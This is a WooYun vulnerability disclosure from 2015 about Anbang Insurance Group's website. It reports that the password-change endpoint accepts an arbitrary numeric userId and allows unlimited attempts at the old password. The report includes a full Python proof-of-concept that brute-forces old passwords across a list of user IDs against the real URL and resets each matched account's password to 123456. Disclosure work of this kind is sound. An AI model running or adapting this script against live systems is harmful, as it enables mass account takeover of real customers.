当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119851

漏洞标题:安邦保险集团存在逻辑漏洞可遍历用户ID暴力破解用户原始密码进而重置用户密码(附脚本)

相关厂商:安邦保险集团

漏洞作者: 月无痕

提交时间:2015-06-12 08:15

修复时间:2015-06-17 08:16

公开时间:2015-06-17 08:16

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

漏洞URL:http://www.ab95569.com

详细说明:

利用burpsuite进行抓包后发现,userID为纯数字,oldPwd可暴力破解。如图:

bp抓包.png


用户名为邮箱,虽然无法根据userid得到确切的用户名,但可以重置所有用户的密码。
写一个python暴力破解的poc,如下:

#!/usr/bin/python
#coding: utf-8
import sys
import urllib
import urllib2
def get_headers(dt):
headers = {
'Accept': '*/*',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'www.ab95569.com',
'Content-Length': dt,
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cookie': 'pgv_pvi=9633317888'
}
return headers
def guess_password(oldpwd,userid):
for i in oldpwd:
for j in userid:
params = urllib.urlencode({'oldPwd':i,'newPwd':'123456','userId':j})
dt = len(params)
headers = get_headers(dt)
try:
url = 'http://www.ab95569.com/user/updPwd.htm'
req = urllib2.Request(url,params,headers=headers)
response = urllib2.urlopen(req,timeout=3)
data = response.read()
if '保存成功' in data:
print 'userid: %s, oldpwd: %s' % (j,i)
except Exception, e:
print e
def get_oldpwd(filename1):
temp1 = []
files = open(filename1,'r')
for i in files:
i = i.strip()
temp1.append(i)
return temp1
def get_userid(filename2):
temp2 = []
files = open(filename2,'r')
for i in files:
i = i.strip()
temp2.append(i)
return temp2
if __name__=="__main__":
oldpwd = get_oldpwd('password.txt')
userid = get_userid('userid.txt')
guess_password(oldpwd,userid)


漏洞证明:

重置密码.png


为了不修改其他用户的数据,我只用自己的2个用户进行了测试。密码均修改为123456。

修复方案:

1.userId变为用户不可控
2.对密码修改时进行逻辑判断

版权声明:转载请注明来源 月无痕@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-17 08:16

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-08-25:十分感谢,我们已经组织人员修复